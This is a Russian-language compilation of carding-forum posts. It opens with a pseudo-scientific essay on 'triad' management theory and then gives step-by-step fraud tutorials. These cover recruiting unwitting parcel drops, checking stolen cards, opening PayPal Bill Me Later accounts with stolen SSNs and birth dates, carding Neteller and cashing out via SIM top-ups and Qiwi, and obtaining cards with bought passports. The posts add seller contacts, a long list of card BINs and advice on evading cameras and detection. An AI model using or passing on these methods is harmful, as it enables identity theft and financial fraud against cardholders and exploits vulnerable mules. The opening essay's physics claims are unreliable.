Построение управления в рамках любой, достаточно множественной социальной группы или решение задач индивидуального развития в социальной среде, равно как и формирования поля воздействия на любой социальный объект, не может быть осознано без введения в концептуальную философскую базу раскрывающей механизмы работы таких систем. Классические представления строятся на принятии дуализма, как практики реализующий любой механизм действия. В законе Ньютона это звучит, как действие равно противодействию, на бытовом уровне это понятие Плохой и Хороший, религиозном – Добро и Зло. Справедливости ради дадим классическое определение дуализма:
«ДУАЛИЗМ (лат. dualis - двойственный) - 1) философская интерпретационная парадигма, фундированная идеёй о наличии двух несводимых друг к другу начал: духовной и материальной субстанций (онтологический Д.: Декарт, Мальбранш и др.; именно в этом контексте Вольфом был введен термин "Д."), объекта и субъекта (гносеологический Д.: Юм, Кант и др.), сознания и телесной организации человека (психофизиологический Д.: Спиноза, Лейбниц, окказионализм, В.Вундт, представители психофизиологического параллелизма), а также добра и зла (этический Д.), природного мира и свободы, факта и ценности (неокантианство), темных и светлых начал бытия (доконцептуальные мифологические и раннеконцептуальные космологические модели: орфизм, зороастризм, манихейство, гностицизм и др.)»

Откидывая сложную для понимания читателя терминологию - дуализм господствующая сегодня философская доктрина означающая, по сути, единство борьбы противоположностей. При этом, как мы видим из определения, достижение любого их полюсов концепта не возможно в принципе. Таким образом, концептуально Цель в Дуализме, есть следствия сложения и вычитания Плюса и Минуса в той или иной пропорции, при этом эти понятия рассматриваются как относительные с учётом объекта действия. В бытовом понимании: что одному, хорошо другому плохо. Эта классика философии рождает всю нынешнюю общественную, социальную, научную структуру, формирует образование.
Методология управления от дома до государства строится исключительно на принципах дуализма, как базовой концепции. Однако, в реальности подобный подход входит в противоречие с реальной общественной и физической жизнью. Причина тому, на деле заложена в самом определении Дуализма, на деле, нет объектов участников реальных событий обладающих свойствами абсолютного Плюса или Минуса, все реальные объекты есть конгломерат свойств выражающихся в сложных структурах самоорганизации, где компиляция факторов Плюса и Минуса, представляет из себя многоуровневые системы. Что же на деле? Ведь без понимания механизма реального действия на сложные системы не возможно разработать эффективный механизм управления, в том числе индивидуального существования.
На деле мы предлагаем рассматривать все объекты не как результат Дуального воздействия, а как результат работы Трёх независимых составляющих: Плюса, Минуса и Цели в данной точке в данный момент времени (понимая под объектами не только физические объекты, но и вообще все объекты осознаваемые человеком в том числе и собственно процессы не исключая и социальные). Цель при этом имеёт самостоятельное существование и не зависит от объекта. Чушь скажете вы, как может Цель существовать без объекта генератора процесса, ведь в любом учебнике философии и физики ясно определено, так быть не может, ведь тогда будет нарушаться принцип причинности. Может.
Примеров тому масса, просто явления эти пограничные, например, в аномальном гравитационном поле черной дыры происходит нарушение принципа причинности, Эйнштейн придумал массу «птолемеёвских» штучек чтобы обойти эту проблему в своей Общей теории относительности.
Триализм, обладает свойствами, не достижения вершин своей Триады, так же, как и Дуализм.

Дуализм в нашей концепции, это усеченный Триализм, без осознания Цели формирования процесса.
Цель в нашей концепции не есть следствие процесса взаимодействия Плюса и Минуса варьируемая их соотношением, а есть существующая Независимо образование равное им по статусу и функционалу обладающая тем же самым свойством не достижимости в реальности, каким является недостижимость абсолютного Плюса или Минуса, абсолютного Добра и Зла и т.д.
Ну и что скажете вы, прочитав предыдущий абзац, что это нам дает, зачем так сложно рассматривать внешне простые проблемы социального управления и личной истории? А разве вы не являлись свидетелями странных процессов трансформации плюса в минус и наоборот на примере собственной жизни, на примере общественных процессов или затрагивающих каждого экономических проблем?
Как можно рассматривать сложные структуры, коими в частности, являются социальные и общественные явления, без методологии их понимая. В противном случае Вы, проецируя на ситуацию свое понимание, пытаясь достигнуть Цели будете получать в итоге обратный эффект.
Знакомо? Тогда читаем дальше, если же вы уверены, что существующая обще распространенная методология управления жизни вас устраивает, читаете нечто иное, Гари Потера например или рекомендации МВФ, что по сути одно и тоже если не понимать цели и задачи одного и другого.

Продолжим. И так мы определили, что реальность есть результат Действия Трёх независимых источников действия Плюса, Минуса и Цели в данном месте в данный момент времени. Ограничение на место и время необходимо т.к. мы утверждаем, что аналоги квантово-механических эффектов микромира играют существенную роль в больших макросистемах. Исходя из выше изложенного, в реальности объектом исследования должны быть не некие объекты, как таковые, а процессы их взаимодействия. В квантово механическом варианте это значит, что мы никогда не знаем объекта, как такового (из за уравнения Гейзенберга это вообще не возможно в принципе), а всегда наблюдаем его как результат его взаимодействия с прибором причем изменения происходят, как с объектом так и с прибором, что принципиально. В узком применении к социальным явлениям, это означает, что любое взаимодействие меняет не только объект взаимодействия, но и саму действующую на объект структуру, причем изменения формируются Целью. На практике, ставя задачу достижения абсолютного
Плюса, вы порождаете Равновесный вашим усилиям механизм противодействия определяемой Целью самоорганизации системы. В итоге система не улучшается, несмотря на ваши усилия, а наоборот, раскачивается порождая колебательные процессы, в которых могут рождаться, в том числе солитонные и резонансные явления по мере развития ситуации во времени. Вот откуда получается, затрачивая колоссальные усилия вы не можете достичь Цели, а удаляетесь от неё, причем чем больше усилий, тем больше удаление и тем сложнеё достижение. В тоже время ваш сосед Вася достигает того же самого без видимых усилий.
Ну конечно, скажете вы, а изначальные условия? Так сказать стартовые позиции. Конечно, стартовые позиции имеют огромное значение на темп реализации действия. Но, они не имеют функционального значения. Не может быть, скажете вы, по жизни знаю, вот сын генерала уже генерал. Верно, но и что, все ведь нужно рассматривать с точки зрения целей и задач объекта, т.е. в применении к живым объектам с точки зрения его Воли Действия. Если изначальные условия совпадают с задачами Воли, то тем самым сокращается путь достижения процесса, если нет, то происходит торможение. Ага, скажет читатель, вот я и поймал автора… торможение. Правильно поймал, дорогой читатель, только не учел, что Цель существует независимо, значит для решения задачи вам нужно изменить Цель, вернеё сместить её на вектор изначальных условий.
Нужно также учитывать, интерпретируя уравнение Гейзенберга к макропроцессам, что определение бесконечно точно в данный момент времени и места, не представляется реальным, прежде всего потому, что на любое реальное явление накладывается проекция явлений высшего порядка, которое трансформирует Цель во времени и пространстве. Иначе говоря, процесс влияет на Цель, но не объект влияет на неё, но определяет Действие через Волю. Ну, загнул, подумал читатель. К сожалению, изложение концепта управления не возможно без, хотя бы краткого, изложения концепта действия. Здесь мы даем только самые общие вводные представления, болеё подробно тема будет раскрыта в следующих статьях.
Явление влияния систем высшего порядка на исследуемую систему приводит для объекта внутри системы к проявлению эффекта Бабочки, когда внешне символичные и незначительные события формируют в итоге глобальные изменения всей системы вплоть до полного её разрушения и создания иной конструкции. Для человека и социальных систем, это означает изменение Цели действия под воздействием внешней Воли. Где под Волей следует понимать и волю человека (или группы) Адепта управления влияющего на выбранную систему, так и влияние болеё высоких систем вне антропологического характера, формирующие состояние объекта через эффект Бабочки, в бытовом определении – удачу\неудачу. Мы не будем в данном Введении касаться темы трактовки
Религиями данного концепта влияния высших сил, но отметим очевидность того, что такое влияние не имеёт отношения к собственно антропологическим определениям Добра и Зла, а формирует Цели. И это принципиально.
Теперь, когда мы ввели основные философские концепты, базовые принципы корреляции объектов, принципы влияния систем высшего порядка (научная интерпретация - теория Хаоса), определили Триаду, как физическую структуру, определяющую развитие Действия через недостижимые полюса Плюса, Минуса и Цели, мы можем рассматривать некоторые примеры.
Прежде всего, пытливый читатель задаст себе вопрос, если подобные триадные структуры работают, тогда проявление их работы должно явно выражаться в развитии аналогов физических процессов в действии больших масс людей. Так оно и есть:
В поведении толпы выявлены фазовые состояния. Анализ видеосъемки движения толп людей во время Хаджа позволил немецким физикам выявить в поведении толпы различные фазовые состояния - в том числе и те, которые могут угрожать жизни людей. Д-р Дирк Хелбинг (Dirk Helbing) и Андерс Йоханссон (Anders Johansson) из Дрезденского технологического университета изучили видеозапись инцидента, произошедшего в январе 2006 года на мосту Джамарат, в котором погибло около 300 паломников. С помощью компьютера они смогли определить скорость и положение отдельных людей, движущихся в огромной толпе в сторону моста.
В 45-минутной записи ученым удалось выделить три отдельных фазы движения. На первой стадии паломники стабильно движутся в сторону моста, при этом скорость движения уменьшается с увеличением плотности толпы. Затем происходит внезапный резкий переход ко второй фазе движения – движенияю с остановками, которое представляет собой череду волн, распространяющихся вдоль направления движения. Такие волны наблюдаются примерно в течение 20 минут, при этом плотность толпы продолжает расти, и внезапно наступает третья и самая опасная фаза. В этой точке фазового перехода группы людей начинают хаотично двигаться во всех возможных направлениях – это явление Хелбинг и Йоханссон назвали «турбулентностью толпы», сообщает PhysicsWeb. Учёные полагают, что турбулентность образуется, когда люди начинают паниковать и толкаться, стремясь увеличить свое личное пространство. При этом в толпе образуются сильные волны сжатия, отбрасывающие людей на несколько метров, в результате чего сотни паломников оказываются растоптанными. Ученые
установили, что люди начали гибнуть спустя 10 минут после установления турбулентности и через 30 минут после начала движения с остановками. Учёные считают, что автоматическое отслеживание точек фазовых переходов с помощью систем видеонаблюдения позволит властям своевременно принимать меры для обеспечения безопасности людей.

По сути работа любых систем взаимодействия как физических так и социальных определяется указанным нами механизмом. Частные проявления которого, наблюдается в виде квантово-механических эффектов на микро уровне, эффектов подобных эффекту Бабочки на макро уровне (теория Хаоса) и социальных революциях на социальном уровне, в экономике на работе предприятий.
Задача стоит в том, чтобы, объединяя эти три основополагающие концепции адаптировать методы управления к социальным явлениям.
При этом следует понимать, учитывая выше изложенную концепцию, что такие методы могут быть направлены, как на развитие системы точки приложения Воли, так и на её деградацию либо полнеё перерождение. Надо сказать, что некоторые частные аспекты такой методологии находят проявление у различных групп исследователей. Всем известны достаточно интересные разработки, например той же www.dotu.ru, или эффективное применение методик нелинейного управления мало известной группой американских разработчиков спонсируемой Госдепом США в период подготовки и осуществления «оранжевого» бунта на Украине (не путать с самими «оранжевыми», это объекты управления нулевого уровня). Однако, существенным недостатком таких разработок, являетсяограничение наложенное черезмерной антропологизацией механизмов влияния. Например, это проводит в первом случае к ошибочному пониманию роли личности в истории (Сталин), во втором, к закручиваю механизма обратного действия влияющего на самого Адепта управления (иллюзия «избранности»).

P.S.: На правах копипаста (темы).
Тема достаточна сложна для понимания (загуглите непонятные термины), и создана для обсуждения Триады управления как методологической системы и степени её полезности для борда (хоть мне и кажется, что это уже не просто борд). Продолжение следует... разумеётся, если будет интерес.


Как найти дропо в РУ для новичков (2 способа)

Привет всем! Данная тема будет интересна болеё не опытным в нашем деле зайчатам.

Способ первый.
Размещаем на сайте о работе следующую вакансию:
Название - "Прием посылок и корреспонденции"
Подробности вакансии: подработка для домохозяек, молодых мам в декрете, пенсионеров.
Оплата: 500р. За одно получение.
Если написали на почту, отвечаем к примеру, мол из-за основной работы не хватает времени на получение посылок, стоять в очереди на почте и.п. Условие 500р за прием, с человека только фио адрес и телефон.
Я лично когда еду за посылкой к дропу, оставляю машину подальше и пользуюсь левой симкой с телефоном, не встречаюсь там где есть камеры.

Способ второй.
Потенциальных дропов куча в гипермаркетах и т.п.
Уборщики тележек и технички. Не стесняйтесь, подходите и предлагайте подработку. В приоритете женщины.

Я лично своим дропам делаю подарки, за что они иногда избавляют меня от оплаты.
Можете заранеё договориться с дропом, что оплата вещами.
Допустим у вас есть шлющий шоп детской одежды, ищем молодую маму и предлагаем подработку, оплата детскими вещами.


Skype. Не логинится [Решение]

1. Деинсталируем скайп с компьютера
2. Идем в C:\Users\Имя пользователя\AppData\Roaming (Windows 7) и удаляем папку Skype
3. Запускаем CCleaner или любую подобную программу и чистим реёстр.
4. Жмем win+r и вписываем regedit, откроется реёстр windows. Далее жмем ctrl+f и вводим skype.
Поиск найдет запись в которой будет упоминаться skype - удаляем её.
Затем жмем F3 и повторяем удаление записи, и так до тех пор пока не удалим все записи (у меня было около 30 ссылок где то).
5. Запускаем программу для смены номера жесткого диска (2 проги в одном архиве), указываем любой 8-ми значный номер и присваиваем его жесткому диску. Перезагружаемся.
6. Ставим свежую версию скайпа (полная версия).


Плохой vpn, хороший vpn (подпись трафика)

Как и обещал периодически публикую тут свои статейки. Сегодня не старая совсем, а недавно что немного дописанная статься о vpn сервисах, без которых мы как рыба на суше.
Все знают что к выбору vpn сервиса нужно подходить очень ответственно и обходительно. Из очевидных вещей: почитать правила, почитать отзывы, сравнить ценовую политику, возможно взять денег на тест.
Но, как показывает практика, все сервисы божатся что не ведут логов, у сервисов которые занимаются своим продвижением часто есть покупные положительные отзывы в разных количествах. Эти и другие нюансы делают выбор одного из "фундаментных блоков" нашей безопасности невыносимо трудным.
Сегодня я опишу еще один неплохой способ проверить свой текущий или только что взятый на тест vpn: посмотреть подписывает ли он трафик.
Подпись трафика, это не что иное, как указание своих данных в открытом виде при старте сессии (например, когда вы нажимаете подключить openvpn). Это может быть сертификат безопасности соединения и ряд других данных. В принципе, в том что vpn при старте сессии выставляет свои реальные данные нет ничего плохого, но и хорошего тут абсолютно ничего нету тоже. Во-первых, при необходимости, ваш провайдер будет знать какой именно зашифрованный трафик и к кому вы гоняете, а значит органам проще будет кинуть на вас абузу вашему vpn провайдеру. Во-вторых, что более печально, в открытых данных может быть например номер вашего аккаунта. Я считаю что это конкретный слив сервиса и упрощение его общения с органами. Они кинут ему номер вашего аккаунта - сервис отдаст им ваши логи.
Все выше перечисленное мое мнение, многие могут поспорить что это ничего не значит, и логов сервис может и не иметь. Да, он может не иметь логов, но иметь хотя бы ip адреса ваших входов. В любом случае я считаю, что просто так такие данные хороший vpn провайдер указывать не будет, а
если он это делает, то от него надо бежать как от огня.
И так, что нам нужно чтобы узнать подписывает ли ваш vpn трафик? Как обычно мы будем разбирать win, пользователи линукса и так грамотные или привыкшие гуглить и сами все сделают ;)
Нам нужна программа CommView. Это программа для сетевого анализа и мониторинга. Она платная, поэтому лучше скачать её с какого-нибудь крупного трекера. Я надеюсь установка программы и таблетки проблем не вызовет. Поэтому начнем сразу с настройки:
1. Чтобы не писать лишние логи нам нужно узнать с каким портом устанавливает соединение наш vpn. Обычно это 80 или 443 порт, но бывает и иначе. Проще всего это сделать посмотрев лог подключения openvpn.
2. Нужно установить фильтр на отлов пакетов по порту нашего vpn.
3. Выбрать сетевой адаптер через который vpn направит свой трафик (т.е. адаптер через который вы получаете интернет). Нажать кнопоку начать захват и нажать подключение openvpn клиента.
4. После установки соединения с сервером можно выключить openvpn клиент и нажать стоп в CommView. Приступаем к анализу полученного трафика. Меню Инструменты -> Реконструкция TCP-сессии. Затем выбрать первый пакет для реконструкции (самый первый принятый в нашем случае):
5. Теперь мы видим лог записанной сессии, и ищем в её начале информацию не похожую на обычную абракадабру) Если находим, то печалимся и меняем vpn (мой совет) или забиваем и пользуемся дальше. Вот пример плохого vpn сервиса который палит не только себя, но и номер вашего аккаунта.

Вот пример хорошего сервиса.
Однако, хочу отметить, что если сервис не подписывает трафик, это еще не значит что он не ведет логи. Поэтому все вышеописанное не является основанием, чтобы выбирать не подписывающий
трафик сервис как 100% надежный. Стоит учитывать еще кучу данных о сервисе. Но, как я написал выше - из двух этих примеров, второй у меня будет в явном приоритете.
Всем добра и анонимности.


Узнаём Минидеп СС

Переходим на сайт https://www.v.me
Выбираем "Personal"
Нажимаем "Create an Account"
Далее создаем аккаунт на данные холдера сс
Вводим email на который будем получать Алерты
Нажимаем "Create Account"
Далее вбиваем данные карточки(Инфа о СС должна быть валидной)
После привязки карты включаем алерты
Теперь обо всех операциях больше 1$ нам на email будет приходить алерт
Работает в трёх странах, Канада, США и Австралия.
Bank of America НЕ пробивается!



Делаем самореги Paypal BML

В этой статье, мы будем делать ****** bml. Многим известна эта контора, но не каждый сразу сумел её овладеть, попробую детально все разъяснить в этой статье, начнем с общих знаний о конторе.
Billmelater - является ****** сервис, который позволяет купить сейчас, а заплатить потом. Думайте об этом как безопасные, мгновенные, и многоразовые кредитной линии без пластика. Bill Me Later доступна в качестве оплаты в тысячах интернет-магазинов и один раз добавлено в ваш ****** счёт, он может быть использован практически везде.
Вы можете применить сегодня, или по своему усмотрению применять во время проверки. Чтобы подать заявку, просто введите дату рождения и последние 4 цифры вашего номера социального страхования, то принимаю условия. Вы получите одобрение решения в считанные секунды.
Это так в общих чертах, приступим непосредственно к работе, что нам понадобится:

1. Полная инфа о холдере (в том числе SSN, DOB)
2. Чистый дедик от пп
Первым делом заходим на дед и проверяем штат и город дедика, это легко сделать зайдя на сайт whoer.net. Узнали? Отлично, теперь стоит взять инфу под штат или лучше всего под город. Инфу можно найти у селлеров, вытащить из бд, найти в халяве (не рекомендуется использовать, имхо испортите дед и потратите свое время). Советую брать холдера с добом 1935-1960 годов, и лучше бы женского пола. Так же хочу добавить, лучше всего делать все это в будние дни, и лучше бы в середине дня в США. И так мы все нашли, и готовы приступать. Будем считать что на этом этапе не появилось вопросов. Теперь стоит проверить нашу инфу перед получением самого бмл.
Идём в любой сервис и проверяем верность нашего ssn, и использовал способ этой темы проверка ссн, после проверки правильности, заходим на дед и ищем ближайший браузер, советую использовать firefox (по своим усмотрением больше всего проходит на него), скачали, установили, запустили, Далее регистрируем мыло.
На счет мыла советую использовать aol.com или yahoo.com. Имя и фамилию при реге ставим холдера - для того что бы было меньше подозрений в дальнейшей работе вашего бмл.
После того как регнули мыло заходим на сайт ******.com и жмем sing up. Заполняем инфу непосредственно ту что достали. Так же хочу посоветовать на этом моменте заполнять её ручками, а не копи-паст, имхо каждый холдер думаю знает как его зовут и где он живет. Будьте внимательны в заполнении. После регистрации акка есть два варианта следующего окна, рассмотрим первый вариант:

Вариант 1:
После регистрации вылазит окно такого содержания. Жмем Continue напротив Add Bill Me Later, нас перекидывает на сайт самой конторы.
Далее жмем Click here to apply нас перекидывает на авторизацию через пп, жмем YES.
На этом этапе проверяем введенные данные и продолжаем авторизацию жмем Allow.
Теперь не посредственно вводим DOB и 4 последних цифры SSN.
Далее прокручиваем вниз и соглашаемся со всеми правилами, а так же не забываем проскролить термы тут, и жмем I Agree and Continue
Если мы все сделали правильно и наш холдер не имел плохих кредитных историй.
Поздравляю вы успешно получили свой первый и думаю не последний БМЛ акк!

Вариант 2:
Этот вариант меня больше радует, так как на него больше шансов получить бмл, и так, после реги первое окно.
Заполняем его и жмем Agree and Continue.
Если все прошло успешно получаем такое радостное для нас окно.
Поздравляю вы успешно получили свой первый и думаю не последний БМЛ акк!
Куда деть вашу блмку расписывать я не буду, вы сами уже найдете применение ей, но никогда не забывайте что таким бмлками лучше отлежатся неделю-вторую, а так же не забывайте сохранить куки, палка любит их.
Вообщем основные сведения о создании Bill Me Later думаю я смог донести до вас, всегда тренируйтесь и не останавливайтесь на неудачах и так же на достигнутом! Удачных апрувов!


Запуск виртуалки с флешки и её шифрование

Несколько подскочил мой уровень паранойи в последнеё время из-за всяких страшных историй в чатике и решил я работать с флешки. Форум перерыл, а адекватного гайда как, собственно, запустить
виртуалку с флешки не нашёл, и не только я, видел несколько постов с той же проблемой. Разобрался сам, плюс соклуб помог и теперь делюсь с вами.

Шифрование флешки с помощь TrueCrypt:
1. Идём в магазин и покупаем флешку на 32Gb минимум USB3.0. Если USB3.0 портов на компе нет, то берём 2.0
2. Качаем TrueCrypt версии 7.1а
3. Вставляем флешку, запускаем программу TrueCrypt. Нажимаем «Создать том». Откроется окно «Мастер создания томов». Выбираем «Зашифровать несистемный раздел/диск» — «Далее»
В следующем окне выбираем «Обычный том» — «Далее». Или «Скрытый том», если хотите с двойным дном, этапы аналогичны.
На этапе установки «Размещения тома» выбираем «Устройство..» (флешку), которое будем шифровать.
В «Режиме создания тома» выбираем «Создать и отформатировать зашифрованный том».
«Настройки шифрования» и «Размер тома» оставляем без изменений. «Далее».
Придумываем пароль.
Нажимаем «Да»
На завершающем этапе установки «Форматирование тома» изменяем файловую систему на «NTFS».
Это важно, т.к. на FAT32 виртуалка будет тормозить. Нажимаем «Разметить» — запускается процесс шифрования раздела (флешки).
После окончания форматирования появится окно
Нажимаем «Ок». Флешка зашифрована!
Завершаем работу с «Мастер создания томов» — кнопка «Выход». После этого можно работать с
шифрованной флешкой.

Чтобы пользоваться зашифрованой флешкой:
1. Открываем TrueCrypt, выбираем какой-нибудь диск, жмём Select Device, появляется такое окно
2. Выбираем нашу флешку, жмём "Ок", жмём "Mount", вводим пароль жмём "Oк". Флешка будет отображаться как ещё один системный диск.
Чтобы расшифровать флешку нужно её отформатировать.

Установка виртуальной машины на флешку
1. Качаем готовую машину https://wwh.su/threads/2-1-idealnaja-mashina-dlja-vbiva.2067. У меня готовая машина для VirtualBox не запускалась на флешке, нужно было только, если с нуля создавать свою.
Для VMware всё ок, если хотите с нуля, то лучше сначала установите на локальном диске виртуалку, а потом скопируете на флешку.
2. Скачали архив, разархивировали и просто записываем это на флешку. Всё, Далее вставляя флешку, мы расшифровываем её, запускаем VMWare, жмём открыть виртуальную машину и выбираем её с
нашей флешки.
3. Советую полностью убрать все эффекты Aero в Win7, настроить на максимальное быстродействие.
Так же все проги, которые улучшают быстродействие на основной машине можно использовать и на виртуалке, например прога Auslogics BoostSpeed.

P.S.: На абсолютное знание этой темы не претендую, просто описал свой опыт. Если что, поправляйте.


Вбив в неттеллер и вывод его на сим. Схема по заливам на сим.

I) Форумы.
Чтобы работать в этом направлении я рекомендую зарегистрироваться на дарк форумах.

II) Материал.
Основной материал, с которым мы будем работать, это платёжная система Neteller. Далее есть два варианта, мы можем покупать уже готовые аккаунты Neteller с балансом или делать самостоятельно.
Там будем просто вбивать номер карты и чекер скажет жива ли она. Если мертва, то идём к селлеру или в шоп за заменой. Замена обязательна для мёртвых карт.
Далее, когда купили картонки, пойдём регистрировать аккаунт Neteller. Для этого будем использовать дедик под страну, которой будет аккаунт Neteller. Я рекомендую двух продавцов дедиков:
Ястреб ICQ 1332021
Аквелон ICQ 489452
Купив дедик под нужную страну, заходим в него и начинаем регистрироваться в Нетеллере.
1) Регистрируем почту. Я советую hotmail.com, это быстреё всего.
2) Идём на сайт Neteller.com
3) Жмём кнопку регистрация
4) Заполняем
Если карта с вбв, то нас перекинет на сайт verifiedbyvisa и предложит ввести VBV Нетеллера можно использовать платёжную систему Entropay и если вы будете пропускать весь процесс создания аккаунта сомостоятельно, а будете просто скупать нужные нам платёжные системы, то скупаем и Neteller и Entropay. В этом случаем схема упрощается до нескольких кликов! Весь материал выше это для тех, кто хочет зарабатывать больше, не завсеть от продавцов нужных нам аккаунтов и работать абсолютно автономно, но и немного больше работать.

III) Перевод на сим.
Я покажу вам два варианта обнала подробно. Остальные дам в виде ссылок на сайты, которые так-же годятся, чтобы слить деньги на сим карту. С ними вы сможете разобраться самостоятельно, а так-же поняв смысл схемы, вы сможете играть с Гуглом и находить новые способы, о которых будете знать только вы, а значит и страха о том, что тема умрёт не будет, а это комфортное рабочеё состояние.
1) Обнал через VCC Netellera
Для этого нам понадобиться помимо самой сим карты, ещё и VCC Neteller. VCC это виртуальная карта, у неё есть все те же самые данные и функции, как и обычной. Разница лишь в том, что физически карты не существует. В общем для этого идём в аккаунт Neteller, который мы купили или создали самостоятельно.
Слева жмём кнопку карты Net+
Жмём добавить виртуальную карту Neteller
Идём на сайт yandex.ru и регистриурем там почту и Яндекс.Деньги
Внизу видим в разделе платежи, мобильную связь. Именно её и будем оплачивать
Я рекомендую делать всё в один платёж. Обязательно ваша система должна быть чистой, ваш яд должен быть новый, ваша симка должна быть новой и не фигурировать в яде ранеё.
Если будете соблюдать все эти правила, то всё получится с первого раза и без заморочек.

2) Перейдём ко второму способу залива на сим с Netellera. Будем заливать не через VCC, а напрямую с аккаунта платёжной системы Neteller.
И так идём на сайт www.cysend.com
Вводим номер телефона на который будем заливать через +7 и жмём recharge.
Жмём create an account
Вводим все данные такие-же, как были в Netellere, только телефон вводим тот, на который льём.
ОБЯЗАТЕЛЬНО ВВОДИМ ДЕЙСТВИТЕЛЬНЫЙ АДРЕС ЭЛЕКТРОННОЙ ПОЧТЫ
Ставим галочку I agree with Cysend.com Service Conditions и жмём create an account
Нас кидает на другую страничку и говорят, что отправили нам смс. Ждём.
Если получили жмём Yes и вводим код из смс Далее.
Если не получили (бывает очень часто) жмём NO.
Нам предложат подвердить номер и язык. Соглашаемся жмём CALL ME и ждём звонка.
Нам покажут цифровой код, который нужно будет ввести в мобильном после звонка.
Ввели цифровой код, мужчина вежливо попрощается, а нам предложат ввести свои полны данные.
Вводим всё, как в аккаунте Neteller и жмём save.
Теперь идём на свою почту и находим там письмо.
Идём по ссылке Confirmation link.
Получем поздравления, наш емейл адрес подтверждён!
Теперь жмём add funds.
Выбираем способ оплаты Neteller, сумму оплаты и вводим данные своего аккаунта Neteller
Если у вас хватило денег на аккаунте Netellera, то ваш баланс пополнится.
Если вам написали, что транзакция холд, значит где-то вы спалились, не правильно указали данные или у вас грязный ip, но это совсем не страшно, потому-что в этом случае деньги дойдут не моментально, а в течении пары часов просто подождите.
Теперь, когда аккаунт www.cysend.com пополнен, жмём recharge mobile.
Вводим номер телефона, нас кинет на страницу выбора, выбираем All other payment methods.
Вводим номер, выбираем сумму и способ оплаты-с баланса CY.SEND
Подтверждаем.
Теперь, если вы всё сделал правильно, то ваш баланс будет пополнен на выбранную сумму.
Если вам написали, что транзакция холд, значит где-то вы спалились, не правильно указали данные или у вас грязный ip, но это совсем не страшно, потому-что в этом случае деньги дойдут не моменталньо, а в течении нескольких часов просто подождите.
Историю пополнений потом можно посмотреть во вкладке History справа.

IV) Обнал сим
Чтобы обналичить симку есть масса способов. Я покажу самый простой, который использую сам.
Это обнал через Qiwi.
Идём на сайт http://w.qiwi.ru/
Жмём регистрация, придумываем пароль и вводим пароль из смс. Тут ничего сложного нет, я уверен, что разберётесь и без картинок.
Я покажу Далее на примере Билайна.
Жмём пополнить, выбираем Билайн
Жмём подробнеё, ещё раз авторизируемся если просят.
Вводим сумму перевода с сим карты на Киви.

Не забываем, что
1) На новой сим карте сначала надо потратить 150 рублей, только потом вы сможете переводить с неё деньги.
2) Сумма с учётом комиссии не должна привышать 5000 рублей.
3) Сумма не может привышать 15 тысяч в сутки.
Всё. Нам придёт смс и скажет, что если мы хотим подвердить этот платёж, то должны ответить на эту смс цифрой 1, так и делаем. Ждём 10-20 секунд и получем денежку на киви. Ура.
Как выводить киви рассказывать не буду, разберётесь сами, способов масса.

Можно выводить на пластик, можно менять у менял на что угодно.
Я вывожу на банк аккаунт Русского Стандарта, это стоит всего 1.5%, меня устраивает.

Вот и вся схема. С удовольствием отвечу на любые вопросы. Удачной работы!
P.S: Способы залить на сим с VCC Neteller или с баланса Neteller вы можете поискать сами, всё просто, поиграйте с ключевыми словами Google.
Вот ещё пара контор, которые дают заливать на сим. Но расписывать подробно работу с ними я не буду, всё тоже самое практически, разберётесь и сами. Удачной работы, работайте головой и помните, чтобы зарабатывать деньги, нужно делать то, что говорят вам другие, чтобы делать деньги, нужно придумать что-то своё!
beeline.mobilerecharge.com/buy/mobile_recharge
www.emoney.ge
404198
404199
417617
477968
526782
544797
545041
547763
400686
400687
401648
402734
403186
403187
403188
404198
404199
404325
404768
404769
405235
405236
407547
407573
407579
407580
408240
408241
410614
413234
413267
413268
413854
413855
415011
415480
417084
417287
417345
417379
417389
417617
421626
421660
421661
421853
422338
423609
426127
426128
427766
427880
429009
429019
429021
432789
433315
433332
433335
433703
433704
433705
433912
433913
433914
434114
438916
440506
440577
440578
440626
440627
440632
440633
440634
440750
440751
440793
441069
446152
446154
446156
446158
449342
451148
454408
454409
454412
454417
459434
459533
459598
460058
460329
462737
465817
465891
465892
465893
469743
469744
469745
469746
477968
477976
478770
479086
483081
485651
485710
485711
489388
491728
491826
491827
510084
513437
515873
518526
518806
518965
520651
521164
521168
521364
522464
525405
526765
526781
526782
527420
527449
527683
528044
528051
529040
530268
530652
530653
532182
532183
532758
533404
533406
533597
536446
540094
540296
540741
541050
541266
541352
541597
541604
542087
542777
542778
542781
543401
543970
543971
544134
544397
544605
544795
544797
545041
545547
545790
546286
546331
547144
547145
547376
547515
547525
547737
547763
547815
548069
548392
548583
550155
552605
552626
552642
552760
554259
557044
557049
557050
557051
557092
557093
557720
557736
557747
557774
557775
558445
676545

P.S. Эта тема продается на ММ за 100к руб., на дм со скидкой за 50 к руб. - бины выбиты, ищите свои и юзайте, если имг не открываются, копируйте из свойства картинки урл.


Получение карт Neteller

Всем привет, сегодня я вам расскажу как сделать вериф акк Neteller и получить карту Net+ MasterCard к нему в рашку, на подставные доки и адрес, обходясь без дропа.
Ну или дроп нужен будет чтоб из своего почтового ящика отдать вам конверт с картой сделаной вообще на Васю Пупкина.
Так как заметил что такое добро продают ещё и не дёшего, опираясь на доброту свою душевную и конечно же на свой опыт. Выложу это дело в виде своей мини статьи.
И так начнём. Нам нужно будет 1 (первая, да да с фоткой которая) странца ру пасса. Пасс должен быть действительный не просроченый, поменяный по возрасту и т.д. норм качества, где город рождения будет совпадать с городом куда мы хотим заказать карту.
!!!Важно!!! Пробить серию иномер на действительность на сайте фмс! http://services.fms.gov.ru/info-service.htm?sid=2000
Думаю где пасс взять не нужно пальцем показывать, можно реальные купить, можно попросить нарисовать.
Спросите почему пробивать, ну незнаю сколько не засылал всегда верефицировали, но два акка попросили другой документ и т.д. проверив на этом сайте понял в чем загвоздка они были "Утеряны" либо "не действительны"
Понадобиться носок, дедик, всё что угодно! Но статичное либо из одного диапазона ip. Ибо Нетеллер дошёл до того что банит при входе с другого диапазона ипа нежели при реге. И просит заказать звонок, на саппорт по почте не откликается и категарически соскучившись по вашему голосу просит "поговорить с вами за жили были" попутно проверив секретные вопросы, почты, явки имена. Могут обусловить тем что если пополняли с карты подтвердите мол.
Регаем почту, идём на сайт нетеллера.
Регаемся по данным пасса, в строке адреса пишем естественно город как на скане где роднинький родился. Улицу и дом пишите хоть на соседа, заранеё договорившись с ним что мол заберу друг дурак заказал и т.д. естественно почтовый индекс по адресу должен быть. Ну вообщем тут вы сами себе свободный художник.
Номер телефона можете сразу указывать валидный сотик, ну либо рандом который в не ЗОНЫ, и после верифа акка менять на свой валидный.
Всё зарегались, сохранили 3 секретных вопроса вашей первой любви. Айди и секюр код 6дигитовый.
